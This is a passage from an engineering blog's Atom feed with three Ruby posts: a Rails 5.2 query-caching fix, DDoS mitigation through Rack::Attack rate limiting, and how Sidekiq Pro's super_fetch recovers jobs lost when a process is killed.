       <title><![CDATA[Rails 5.2 fixes query caching in MySQL & PostgreSQL adapters]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-fixes-query-caching-in-mysql-and-postgresql-adapters"/>
      <updated>2018-05-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-fixes-query-caching-in-mysql-and-postgresql-adapters</id>
      <content type="html"><![CDATA[<p>Prior to Rails 5.2, MySQL and PostgreSQL adapters had <code>select_value</code>,<code>select_values</code> &amp; <code>select_rows</code> <code>select_{value,values,rows}</code> methods. Theyimprove the performance by not instantiating <code>ActiveRecord::Result</code>.</p><p>However these methods broke query caching of<code>ActiveRecord::FinderMethods#exists?</code> method. Let's check the issue.</p><pre><code class="language-ruby">&gt;&gt; User.cache do&gt;&gt;   2.times { User.exists?(1) }&gt;&gt; endUser Exists (2.1ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]User Exists (2ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]</code></pre><p>As we can see, query was not cached and sql was executed second time.</p><p>From Rails 5.2, MySQL and PostgreSQL adapters are<a href="https://github.com/rails/rails/pull/29454">no longer override select_{value,values,rows} methods</a>which fix this query caching issue.</p><p>Also, the performance improvement provided by these methods was marginal and nota hotspot in Active Record, so this change was accepted.</p><p>Let's check query caching of <code>ActiveRecord::FinderMethods#exists?</code> after thechange.</p><pre><code class="language-ruby">&gt;&gt; User.cache do&gt;&gt;   2.times { User.exists?(1) }&gt;&gt; endUser Exists (2.1ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]CACHE User Exists (0.0ms)  SELECT  1 AS one FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]</code></pre><p>Now, query has been cached as expected.</p><p>This change has been backported in rails 5.1 from version 5.1.2 as well.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to mitigate DDoS using Rack::Attack]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-mitigate-ddos-using-rack-attack"/>
      <updated>2018-05-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-mitigate-ddos-using-rack-attack</id>
      <content type="html"><![CDATA[<p>Recently, we faced a DDoS attack in one of the clients' projects. There weremany requests from different IPs to root and login paths, and we were runningthrice the usual number of servers to keep the system alive.</p><p>We are using Cloudflare's HTTP proxy and it was doing a great job preventingmalicious requests, but we wanted to check if we can avoid the loading/captchapages which Cloudflare uses to filter requests. We came to a conclusion that wewould be able to mitigate the ongoing attack if we could throttle requests byIP.</p><p>Cloudflare has an inbuilt<a href="https://www.cloudflare.com/rate-limiting/">Rate Limiting</a> feature to throttlerequests, but it would be a little expensive in our case since Cloudflarecharges by the number of good requests and it was a high traffic website. Onfurther analysis, we found that throttling at application level would be enoughin that situation and the gem<a href="https://github.com/kickstarter/rack-attack">Rack::Attack</a> helped us with that.</p><p>Rack::Attack is a Rack middleware from Kickstarter. It can be configured tothrottle requests based on IP or any other parameter.</p><p>To use Rack::Attack, include the gem in Gemfile.</p><pre><code class="language-ruby">gem &quot;rack-attack&quot;</code></pre><p>After <code>bundle install</code>, configure the middleware in <code>config/application.rb</code>:</p><pre><code class="language-ruby">config.middleware.use Rack::Attack</code></pre><p>Now we can create the initializer <code>config/initializers/rack_attack.rb</code> toconfigure Rack::Attack.</p><p>By default, Rack::Attack uses <code>Rails.cache</code> to store requests information. Inour case, we wanted a separate cache for <code>Rack::Attack</code> and it was configured asfollows.</p><pre><code class="language-ruby">redis_client = Redis.connect(url: ENV[&quot;REDIS_URL&quot;])Rack::Attack.cache.store = Rack::Attack::StoreProxy::RedisStoreProxy.new(redis_client)</code></pre><p>If the web server is behind a proxy like Cloudflare, we have to configure amethod to fetch the correct <code>remote_ip</code> address. Otherwise, it would block basedon proxy's IP address and would result in blocking a lot of legit requests.</p><pre><code class="language-ruby">class Rack::Attack  class Request &lt; ::Rack::Request    def remote_ip      # Cloudflare stores remote IP in CF_CONNECTING_IP header      @remote_ip ||= (env['HTTP_CF_CONNECTING_IP'] ||                      env['action_dispatch.remote_ip'] ||                      ip).to_s    end  endend</code></pre><p>Requests can be throttled based on IP address or any other parameter. In thefollowing example, we are setting a limit of 40rpm/IP for &quot;/&quot; path.</p><pre><code class="language-ruby">class Rack::Attack  throttle(&quot;req/ip&quot;, :limit =&gt; 40, :period =&gt; 1.minute) do |req|    req.remote_ip if req.path == &quot;/&quot;  endend</code></pre><p>The downside of this configuration is that after the 1 minute period, theattacker can launch another 40 requests/IP simultaneously and it would exertpressure on the servers. This can be solved using exponential backoff.</p><pre><code class="language-ruby">class Rack::Attack  # Exponential backoff for all requests to &quot;/&quot; path  #  # Allows 240 requests/IP in ~8 minutes  #        480 requests/IP in ~1 hour  #        960 requests/IP in ~8 hours (~2,880 requests/day)  (3..5).each do |level|    throttle(&quot;req/ip/#{level}&quot;,               :limit =&gt; (30 * (2 ** level)),               :period =&gt; (0.9 * (8 ** level)).to_i.seconds) do |req|      req.remote_ip if req.path == &quot;/&quot;    end  endend</code></pre><p>If we want to turn off throttling for some IPs (Eg.: Health check services),then those IPs can be safelisted.</p><pre><code class="language-ruby">class Rack::Attack  class Request &lt; ::Rack::Request    def allowed_ip?      allowed_ips = [&quot;127.0.0.1&quot;, &quot;::1&quot;]      allowed_ips.include?(remote_ip)    end  end  safelist('allow from localhost') do |req|    req.allowed_ip?  endend</code></pre><p>We can log blocked requests separately and this is helpful for analyzing theattack.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('rack.attack') do |name, start, finish, request_id, req|  if req.env[&quot;rack.attack.match_type&quot;] == :throttle    request_headers = { &quot;CF-RAY&quot; =&gt; req.env[&quot;HTTP_CF_RAY&quot;],                        &quot;X-Amzn-Trace-Id&quot; =&gt; req.env[&quot;HTTP_X_AMZN_TRACE_ID&quot;] }    Rails.logger.info &quot;[Rack::Attack][Blocked]&quot; &lt;&lt;                      &quot;remote_ip: \&quot;#{req.remote_ip}\&quot;,&quot; &lt;&lt;                      &quot;path: \&quot;#{req.path}\&quot;, &quot; &lt;&lt;                      &quot;headers: #{request_headers.inspect}&quot;  endend</code></pre><p>A sample initializer with these configurations can be downloaded from<a href="https://gist.githubusercontent.com/ershad/b7ff20bcf8304e76e09c5834cddadff5/raw/e458aba877a010c34f1843d2fb491b8c27711d63/rack_attack.rb">here</a>.</p><p>Application will now throttle requests and will respond with<code>HTTP 429 Too Many Requests</code> response for the throttled requests.</p><p>We now block a lot of malicious requests using Rack::Attack. Here's a graph with<code>% of blocked requests</code> over a week.</p><p><img src="/blog_images/2018/how-to-mitigate-ddos-using-rack-attack/blocked_requests.png" alt="Blocked requests"></p><p>EDIT: Updated the post to add more context to the situation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Increase reliability using super_fetch of Sidekiq Pro]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/increase-reliability-of-background-job-processing-using-super_fetch-of-sidekiq-pro"/>
      <updated>2018-05-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/increase-reliability-of-background-job-processing-using-super_fetch-of-sidekiq-pro</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/mperham/sidekiq">Sidekiq</a>is a background job processing library for Ruby.Sidekiq offers three versions: OSS, Pro and Enterprise.</p><p>OSS is free and open source and has basic features.Pro and Enterprise versions are closed source and paid,thus comes with more advanced features.To compare the list of features offered by each of these versions,please visit <a href="https://sidekiq.org">Sidekiq website</a>.</p><p>Sidekiq Pro 3.4.0<a href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/Pro-Changes.md#340">introduced</a><code>super_fetch</code> strategyto reliably fetch jobs from the queue in Redis.</p><p>In this post, we will discuss the benefits of using <code>super_fetch</code> strategy.</p><h2>Problem</h2><p>Open source version of Sidekiq comes with <code>basic_fetch</code> strategy.Let's see an example to understand how it works.</p><p>Let's add Sidekiq to our <code>Gemfile</code> and run <code>bundle install</code> to install it.</p><pre><code class="language-ruby">gem 'sidekiq'</code></pre><p>Add following Sidekiq worker in <code>app/workers/sleep_worker.rb</code>.</p><pre><code class="language-ruby">class SleepWorker  include Sidekiq::Worker  def perform(name)    puts &quot;Started #{name}&quot;    sleep 30    puts &quot;Finished #{name}&quot;  endend</code></pre><p>This worker does nothing great but sleeps for 30 seconds.</p><p>Let's open Rails consoleand schedule this worker to run as a background job asynchronously.</p><pre><code class="language-ruby">&gt;&gt; require &quot;sidekiq/api&quot;=&gt; true&gt;&gt; Sidekiq::Queue.new.size=&gt; 0&gt;&gt; SleepWorker.perform_async(&quot;A&quot;)=&gt; &quot;5d8bf898c36a60a1096cf4d3&quot;&gt;&gt; Sidekiq::Queue.new.size=&gt; 1</code></pre><p>As we can see, queue now has 1 job scheduled to be processed.</p><p>Let's start Sidekiq in another terminal tab.</p><pre><code class="language-ruby">$ bundle exec sidekiq40510 TID-owu1swr1i INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-40510&quot;, :url=&gt;nil}40510 TID-owu1swr1i INFO: Starting processing, hit Ctrl-C to stop40510 TID-owu1tr5my SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: startStarted A</code></pre><p>As we can see, the job with ID <code>5d8bf898c36a60a1096cf4d3</code>was picked up by Sidekiqand it started processing the job.</p><p>If we check the Sidekiq queue size in the Rails console, it will be zero now.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 0</code></pre><p>Let's shutdown the Sidekiq process gracefullywhile Sidekiq is still in the middle of processing our scheduled job.Press either <code>Ctrl-C</code> or run <code>kill -SIGINT &lt;PID&gt;</code> command.</p><pre><code class="language-ruby">$ kill -SIGINT 40510</code></pre><pre><code class="language-ruby">40510 TID-owu1swr1i INFO: Shutting down40510 TID-owu1swr1i INFO: Terminating quiet workers40510 TID-owu1x00rm INFO: Scheduler exiting...40510 TID-owu1swr1i INFO: Pausing to allow workers to finish...40510 TID-owu1swr1i WARN: Terminating 1 busy worker threads40510 TID-owu1swr1i WARN: Work still in progress [#&lt;struct Sidekiq::BasicFetch::UnitOfWork queue=&quot;queue:default&quot;, job=&quot;{\&quot;class\&quot;:\&quot;SleepWorker\&quot;,\&quot;args\&quot;:[\&quot;A\&quot;],\&quot;retry\&quot;:true,\&quot;queue\&quot;:\&quot;default\&quot;,\&quot;jid\&quot;:\&quot;5d8bf898c36a60a1096cf4d3\&quot;,\&quot;created_at\&quot;:1525427293.956314,\&quot;enqueued_at\&quot;:1525427293.957355}&quot;&gt;]40510 TID-owu1swr1i INFO: Pushed 1 jobs back to Redis40510 TID-owu1tr5my SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: fail: 19.576 sec40510 TID-owu1swr1i INFO: Bye!</code></pre><p>As we can see, Sidekiq pushed back the unfinished job back to Redis queuewhen Sidekiq received a <code>SIGINT</code> signal.</p><p>Let's verify it.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 1</code></pre><p>Before we move on, let's learn some basics about signals such as <code>SIGINT</code>.</p><h2>A crash course on POSIX signals</h2><p><code>SIGINT</code> is an interrupt signal.It is an alternative to hitting<code>Ctrl-C</code> from the keyboard.When a process is running in foreground,we can hit <code>Ctrl-C</code> to signal the process to shut down.When the process is running in background,we can use <code>kill</code> command to send a <code>SIGINT</code> signal to the process' PID.A process can optionally catch this signal and shutdown itself gracefully.If the process does not respect this signal and ignores it,then nothing really happens and the process keeps running.Both <code>INT</code> and <code>SIGINT</code> are identical signals.</p><p>Another useful signal is <code>SIGTERM</code>.It is called a termination signal.A process can either catch itand perform necessary cleanup or just ignore it.Similar to a <code>SIGINT</code> signal,if a process ignores this signal, then the process keeps running.Note that, if no signal is supplied to the <code>kill</code> command,<code>SIGTERM</code> is used by default.Both <code>TERM</code> and <code>SIGTERM</code> are identical signals.</p><p><code>SIGTSTP</code> or <code>TSTP</code> is called terminal stop signal.It is an alternative to hitting <code>Ctrl-Z</code> on the keyboard.This signal causes a process to suspend further execution.</p><p><code>SIGKILL</code> is known as kill signal.This signal is intended to kill the process immediately and forcefully.A process cannot catch this signal,therefore the process cannot perform cleanup or graceful shutdown.This signal is usedwhen a process does not respect and respondto both <code>SIGINT</code> and <code>SIGTERM</code> signals.<code>KILL</code>, <code>SIGKILL</code> and <code>9</code> are identical signals.</p><p>There are a lot of other signals besides these,but they are not relevant for this post.Please check them out <a href="https://en.wikipedia.org/wiki/Signal_(IPC)#POSIX_signals">here</a>.</p><p>A Sidekiq process pays respectto all of these signals and behaves as we expect.When Sidekiq receives a <code>TERM</code> or <code>SIGTERM</code> signal,Sidekiq terminates itself gracefully.</p><h2>Back to our example</h2><p>Coming back to our example from above,we had sent a <code>SIGINT</code> signal to the Sidekiq process.</p><pre><code class="language-ruby">$ kill -SIGINT 40510</code></pre><p>On receiving this <code>SIGINT</code> signal,Sidekiq process having PID 40510 terminated quiet workers,paused the queue and waited for a whileto let busy workers finish their jobs.Since our busy SleepWorker did not finish quickly,Sidekiq terminated that busy workerand pushed it back to the queue in Redis.After that, Sidekiq gracefully terminated itself with an exit code 0.Note that, the default timeout is 8 secondsuntil which Sidekiq can wait to let the busy workers finishotherwise it pushes the unfinished jobs back to the queue in Redis.This timeout can be changed with <code>-t</code> optiongiven at the startup of Sidekiq process.</p><p>Sidekiq <a href="https://github.com/mperham/sidekiq/wiki/Deployment#overview">recommends</a>to send a <code>TSTP</code> and a <code>TERM</code> togetherto ensure that the Sidekiq process shuts down safely and gracefully.On receiving a <code>TSTP</code> signal,Sidekiq stops pulling new workandfinishes the work which is in-progress.The idea is to first send a <code>TSTP</code> signal,wait as much as possible (by default for 8 seconds as discussed above)to ensure that busy workers finish their jobsand then send a <code>TERM</code> signalto shutdown the process.</p><p>Sidekiq pushes back the unprocessed job in Redis when terminated gracefully.It means that Sidekiq pulls the unfinished job and starts processing again whenwe restart the Sidekiq process.</p><pre><code class="language-ruby">$ bundle exec sidekiq45916 TID-ovfq8ll0k INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-45916&quot;, :url=&gt;nil}45916 TID-ovfq8ll0k INFO: Starting processing, hit Ctrl-C to stop45916 TID-ovfqajol4 SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: startStarted AFinished A45916 TID-ovfqajol4 SleepWorker JID-5d8bf898c36a60a1096cf4d3 INFO: done: 30.015 sec</code></pre><p>We can see that Sidekiq pulled the previously terminated jobwith ID <code>5d8bf898c36a60a1096cf4d3</code> and processed that job again.</p><p>So far so good.</p><p>This behavior is implemented using<a href="https://github.com/mperham/sidekiq/blob/6e79f2a860ae558f2ed52b8917d2fede846c0a50/lib/sidekiq/fetch.rb"><code>basic_fetch</code></a>strategy which is present in the open sourced version of Sidekiq.</p><p>Sidekiq uses <a href="https://redis.io/commands/brpop">BRPOP</a> Redis commandto fetch a scheduled job from the queue.When a job is fetched,that job gets removed from the queue andthat job no longer exists in Redis.If this fetched job is processed, then all is good.Also, if the Sidekiq process is terminated gracefully onreceiving either a <code>SIGINT</code> or a <code>SIGTERM</code> signal,Sidekiq will push back the unfinished jobs back to the queue in Redis.</p><p>But what if the Sidekiq process crashes in the middlewhile processing that fetched job?</p><p>A process is considered as crashedif the process does not shutdown gracefully.As we discussed before,when we send a <code>SIGKILL</code> signal to a process,the process cannot receive or catch this signal.Because the process cannot shutdown gracefully and nicely,it gets crashed.</p><p>When a Sidekiq process is crashed,the fetched jobs by that Sidekiq processwhich are not yet finished get lostforever.</p><p>Let's try to reproduce this scenario.</p><p>We will schedule another job.</p><pre><code class="language-ruby">&gt;&gt; SleepWorker.perform_async(&quot;B&quot;)=&gt; &quot;37a5ab4139796c4b9dc1ea6d&quot;&gt;&gt; Sidekiq::Queue.new.size=&gt; 1</code></pre><p>Now, let's start Sidekiq process and kill it using <code>SIGKILL</code> or <code>9</code> signal.</p><pre><code class="language-ruby">$ bundle exec sidekiq47395 TID-ow8q4nxzf INFO: Starting processing, hit Ctrl-C to stop47395 TID-ow8qba0x7 SleepWorker JID-37a5ab4139796c4b9dc1ea6d INFO: startStarted B[1]    47395 killed     bundle exec sidekiq</code></pre><pre><code class="language-ruby">$ kill -SIGKILL 47395</code></pre><p>Let's check if Sidekiq had pushed the busy (unprocessed) jobback to the queue in Redis before terminating.</p><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 0</code></pre><p>No. It does not.</p><p>Actually, the Sidekiq process did not get a chance to shutdown gracefullywhen it received the <code>SIGKILL</code> signal.</p><p>If we restart the Sidekiq process,it cannot fetch that unprocessed jobsince the job was not pushed back to the queue in Redis at all.</p><pre><code class="language-ruby">$ bundle exec sidekiq47733 TID-ox1lau26l INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-47733&quot;, :url=&gt;nil}47733 TID-ox1lau26l INFO: Starting processing, hit Ctrl-C to stop</code></pre><p>Therefore,the job having name argument as <code>B</code> or ID as <code>37a5ab4139796c4b9dc1ea6d</code>is completely lost.There is no way to get that job back.</p><p>Losing job like this may not be a problem for some applicationsbut for some critical applications this could be a huge issue.</p><p>We faced a similar problem like this.One of our clients' application is deployed on a Kubernetes cluster.Our Sidekiq process runs in a Docker containerin the Kubernetes<a href="https://kubernetes.io/docs/concepts/workloads/pods/pod">pods</a>which we call <code>background</code> pods.</p><p>Here's our stripped down version of<a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes deployment</a>manifest which creates a Kubernetes deployment resource.Our Sidekiq process runs in the pods spawned by that deployment resource.</p><pre><code class="language-ruby">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: backgroundspec:  replicas: 2  template:    spec:      terminationGracePeriodSeconds: 60      containers:      - name: background        image: &lt;%= ENV['IMAGE'] %&gt;        env:        - name: POD_TYPE          value: background        lifecycle:          preStop:            exec:              command:              - /bin/bash              - -l              - -c              - for pid in tmp/pids/sidekiq*.pid; do bin/bundle exec sidekiqctl stop $pid 60; done</code></pre><p>When we apply an updated version of this manifest,for say, changing the Docker image, the running pods are terminatedand new pods are created.</p><p>Before terminating the only container in the pod,Kubernetes executes <code>sidekiqctl stop $pid 60</code> commandwhich we have defined using the<a href="https://kubernetes.io/docs/tasks/configure-pod-container/attach-handler-lifecycle-event/">preStop</a>event handler.Note that, Kubernetes already sends <code>SIGTERM</code> signalto the container being terminated inside the podbefore invoking the <code>preStop</code> event handler.The default termination grace period is 30 seconds and it is configurable.If the container doesn't terminate within the termination grace period,a <code>SIGKILL</code> signal will be sent to forcefully terminate the container.</p><p>The <code>sidekiqctl stop $pid 60</code> command executed in the <code>preStop</code> handler doesthree things.</p><ol><li>Sends a <code>SIGTERM</code> signal to the Sidekiq process running in the container.</li><li>Waits for 60 seconds.</li><li>Sends a <code>SIGKILL</code> signal to kill the Sidekiq process forcefullyif the process has not terminated gracefully yet.</li></ol><p>This worked for us when the count of busy jobs was relatively small.</p><p>When the number of processing jobs is higher,Sidekiq does not get enough timeto quiet the busy workersand fails to push some of them back on the Redis queue.</p><p>We found that some of the jobs were getting lostwhen our <code>background</code> pod restarted.We had to restart our background pod forreasons such asupdating the Kubernetes deployment manifest,pod being automatically evicted by Kubernetesdue to host node encountering OOM (out of memory) issue, etc.</p><p>We tried increasing both<code>terminationGracePeriodSeconds</code> in the deployment manifestas well as the <code>sidekiqctl stop</code> command's timeout.Despite that,we still kept facing the same issueof losing jobs whenever pod restarts.</p><p>We even tried sending <code>TSTP</code> and then <code>TERM</code> after a timeoutrelatively longer than 60 seconds.But the pod was getting harshly terminatedwithout gracefully terminating Sidekiq process running inside it.Therefore we kept losing the busy jobswhich were running during the pod termination.</p><h2>Sidekiq Pro's super_fetch</h2><p>We were looking for a way to stop losing our Sidekiq jobsor a way to recover them reliably when our <code>background</code> Kubernetes pod restarts.</p><p>We realized that the commercial version of Sidekiq,Sidekiq Pro offers an additional fetch strategy,<a href="https://github.com/mperham/sidekiq/wiki/Reliability#using-super_fetch"><code>super_fetch</code></a>,which seemed more efficient and reliablecompared to <code>basic_fetch</code> strategy.</p><p>Let's see what difference <code>super_fetch</code> strategymakes over <code>basic_fetch</code>.</p><p>We will need to use <code>sidekiq-pro</code> gem which needs to be purchased.Since Sidekiq Pro gem is close sourced, we cannot fetch itfrom the default public gem registry,<a href="https://rubygems.org">https://rubygems.org</a>.Instead, we will have to fetch it from a private gem registrywhich we get after purchasing it.We add following code to our <code>Gemfile</code> and run <code>bundle install</code>.</p><pre><code class="language-ruby">source ENV['SIDEKIQ_PRO_GEM_URL'] do  gem 'sidekiq-pro'end</code></pre><p>To enable <code>super_fetch</code>,we need to add following codein an initializer <code>config/initializers/sidekiq.rb</code>.</p><pre><code class="language-ruby">Sidekiq.configure_server do |config|  config.super_fetch!end</code></pre><p>Well, that's it.Sidekiq will use <code>super_fetch</code> instead of <code>basic_fetch</code> now.</p><pre><code class="language-ruby">$ bundle exec sidekiq75595 TID-owsytgvqj INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!75595 TID-owsytgvqj INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-75595&quot;, :url=&gt;nil}75595 TID-owsytgvqj INFO: Starting processing, hit Ctrl-C to stop75595 TID-owsys5imz INFO: SuperFetch activated</code></pre><p>When <code>super_fetch</code> is activated, Sidekiq process' graceful shutdown behavioris similar to that of <code>basic_fetch</code>.</p><pre><code class="language-ruby">&gt;&gt; SleepWorker.perform_async(&quot;C&quot;)=&gt; &quot;f002a41393f9a79a4366d2b5&quot;&gt;&gt; Sidekiq::Queue.new.size=&gt; 1</code></pre><pre><code class="language-ruby">$ bundle exec sidekiq76021 TID-ow6kdcca5 INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!76021 TID-ow6kdcca5 INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-76021&quot;, :url=&gt;nil}76021 TID-ow6kdcca5 INFO: Starting processing, hit Ctrl-C to stop76021 TID-ow6klq2cx INFO: SuperFetch activated76021 TID-ow6kiesnp SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: startStarted C</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 0</code></pre><pre><code class="language-ruby">$ kill -SIGTERM 76021</code></pre><pre><code class="language-ruby">76021 TID-ow6kdcca5 INFO: Shutting down76021 TID-ow6kdcca5 INFO: Terminating quiet workers76021 TID-ow6kieuwh INFO: Scheduler exiting...76021 TID-ow6kdcca5 INFO: Pausing to allow workers to finish...76021 TID-ow6kdcca5 WARN: Terminating 1 busy worker threads76021 TID-ow6kdcca5 WARN: Work still in progress [#&lt;struct Sidekiq::Pro::SuperFetch::Retriever::UnitOfWork queue=&quot;queue:default&quot;, job=&quot;{\&quot;class\&quot;:\&quot;SleepWorker\&quot;,\&quot;args\&quot;:[\&quot;C\&quot;],\&quot;retry\&quot;:true,\&quot;queue\&quot;:\&quot;default\&quot;,\&quot;jid\&quot;:\&quot;f002a41393f9a79a4366d2b5\&quot;,\&quot;created_at\&quot;:1525500653.404454,\&quot;enqueued_at\&quot;:1525500653.404501}&quot;, local_queue=&quot;queue:sq|vishal.local:76021:3e64c4b08393|default&quot;&gt;]76021 TID-ow6kdcca5 INFO: SuperFetch: Moving job from queue:sq|vishal.local:76021:3e64c4b08393|default back to queue:default76021 TID-ow6kiesnp SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: fail: 13.758 sec76021 TID-ow6kdcca5 INFO: Bye!</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 1</code></pre><p>That looks good.As we can see, Sidekiq moved busy job back from a private queueto the queue in Rediswhen Sidekiq received a <code>SIGTERM</code> signal.</p><p>Now, let's try to kill Sidekiq process forcefullywithout allowing a graceful shutdownby sending a <code>SIGKILL</code> signal.</p><p>Since Sidekiq was gracefully shutdown before,if we restart Sidekiq again,it will re-process the pushed back job having ID <code>f002a41393f9a79a4366d2b5</code>.</p><pre><code class="language-ruby">$ bundle exec sidekiq76890 TID-oxecurbtu INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!76890 TID-oxecurbtu INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-76890&quot;, :url=&gt;nil}76890 TID-oxecurbtu INFO: Starting processing, hit Ctrl-C to stop76890 TID-oxecyhftq INFO: SuperFetch activated76890 TID-oxecyotvm SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: startStarted C[1]    76890 killed     bundle exec sidekiq</code></pre><pre><code class="language-ruby">$ kill -SIGKILL 76890</code></pre><pre><code class="language-ruby">&gt;&gt; Sidekiq::Queue.new.size=&gt; 0</code></pre><p>It appears that Sidekiq didn't get any chanceto push the busy job back to the queue in Redison receiving a <code>SIGKILL</code> signal.</p><p>So, where is the magic of <code>super_fetch</code>?</p><p>Did we lose our job again?</p><p>Let's restart Sidekiq and see it ourself.</p><pre><code class="language-ruby">$ bundle exec sidekiq77496 TID-oum04ghgw INFO: Sidekiq Pro 4.0.2, commercially licensed.  Thanks for your support!77496 TID-oum04ghgw INFO: Booting Sidekiq 5.1.3 with redis options {:id=&gt;&quot;Sidekiq-server-PID-77496&quot;, :url=&gt;nil}77496 TID-oum04ghgw INFO: Starting processing, hit Ctrl-C to stop77496 TID-oum086w9s INFO: SuperFetch activated77496 TID-oum086w9s WARN: SuperFetch: recovered 1 jobs77496 TID-oum08eu3o SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: startStarted CFinished C77496 TID-oum08eu3o SleepWorker JID-f002a41393f9a79a4366d2b5 INFO: done: 30.011 sec</code></pre><p>Whoa, isn't that cool?</p><p>See that line where it says <code>SuperFetch: recovered 1 jobs</code>.</p><p>Although the job wasn't pushed back to the queue in Redis,Sidekiq somehow recovered our lost job having ID <code>f002a41393f9a79a4366d2b5</code>and reprocessed that job again!</p><p>Interested to learn about how Sidekiq did that? Keep on reading.</p><p>Note that, since Sidekiq Pro is a close sourced and commercial software,we cannot explain <code>super_fetch</code>'s exact implementation details.</p><p>As we discussed in-depth before,Sidekiq's <code>basic_fetch</code> strategy uses <code>BRPOP</code> Redis commandto fetch a job from the queue in Redis.It works great to some extent,but it is prone to losing jobif Sidekiq crashes or does not shutdown gracefully.</p><p>On the other hand, Sidekiq Pro offers <code>super_fetch</code> strategy which uses<a href="http://redis.io/commands/rpoplpush">RPOPLPUSH</a> Redis command to fetch a job.</p><p><code>RPOPLPUSH</code> Redis command providesa unique approach towards implementing a reliable queue.<code>RPOPLPUSH</code> command accepts two listsnamely a source list and a destination list.This command atomicallyreturns and removes the last element from the source list,and pushes that element as the first element in the destination list.Atomically means that both pop and push operationsare performed as a single operation at the same time;i.e. both should succeed, otherwise both are treated as failed.</p><p><code>super_fetch</code> registers a private queue in Redisfor each Sidekiq process on start-up.<code>super_fetch</code> atomically fetches a scheduled jobfrom the public queue in Redisand pushes that job into the private queue (or working queue)using <code>RPOPLPUSH</code> Redis command.Once the job is finished processing,Sidekiq removes that job from the private queue.During a graceful shutdown,Sidekiq moves back the unfinished jobsfrom the private queue to the public queue.If shutdown of Sidekiq process is not graceful,the unfinished jobs of that Sidekiq processremain there in the private queue which are called as orphaned jobs.On restarting or starting another Sidekiq process,<code>super_fetch</code> looks for such orphaned jobs in the private queues.If Sidekiq finds orphaned jobs, Sidekiq re-enqueue them and processes again.</p><p>It may happen thatwe have multiple Sidekiq processes running at the same time.If a process dies among them, its unfinished jobs become orphans.<a href="https://github.com/mperham/sidekiq/wiki/Reliability#recovering-jobs">This Sidekiq wiki</a>describes in detail the criteria which <code>super_fetch</code> relies uponfor identifying which jobs are orphaned and which jobs are not orphaned.If we don't restart or start another process,<code>super_fetch</code> may take 5 minutes or 3 hours to recover such orphaned jobs.The recommended approach is to restart or start another Sidekiq processto signal <code>super_fetch</code> to look for orphans.</p><p>Interestingly, in the older versions of Sidekiq Pro,<code>super_fetch</code> performed checks for orphaned jobs and queues<a href="https://github.com/mperham/sidekiq/issues/3273">every 24 hours</a>at the Sidekiq process startup.Due to this, when the Sidekiq process crashes,the orphaned jobs of that process remain unpicked for up to 24 hoursuntil the next restart.This orphan delay check windowhad been later lowered to 1 hour in Sidekiq Pro 3.4.1.</p><p>Another fun thing to know is that,there existed two fetch strategies namely<a href="https://github.com/mperham/sidekiq/wiki/Reliability/_compare/71312b1f3880bcee9ff47f59c7516c15657553d8...15776fd781848a36a0ddb24c3f2315202696e30c"><code>reliable_fetch</code></a>and <code>timed_fetch</code>in the older versions of Sidekiq Pro.Apparently, <code>reliable_fetch</code><a href="https://github.com/mperham/sidekiq/wiki/Pro-Reliability-Server#reliable_fetch">did not work with Docker</a>and <code>timed_fetch</code> had asymptotic computational complexity <code>O(log N)</code>,comparatively<a href="https://github.com/mperham/sidekiq/wiki/Pro-Reliability-Server#timed_fetch">less efficient</a>than <code>super_fetch</code>,which has asymptotic computational complexity <code>O(1)</code>.Both of these strategies had been deprecatedin Sidekiq Pro 3.4.0 in favor of <code>super_fetch</code>.Later, both of these strategies had been<a 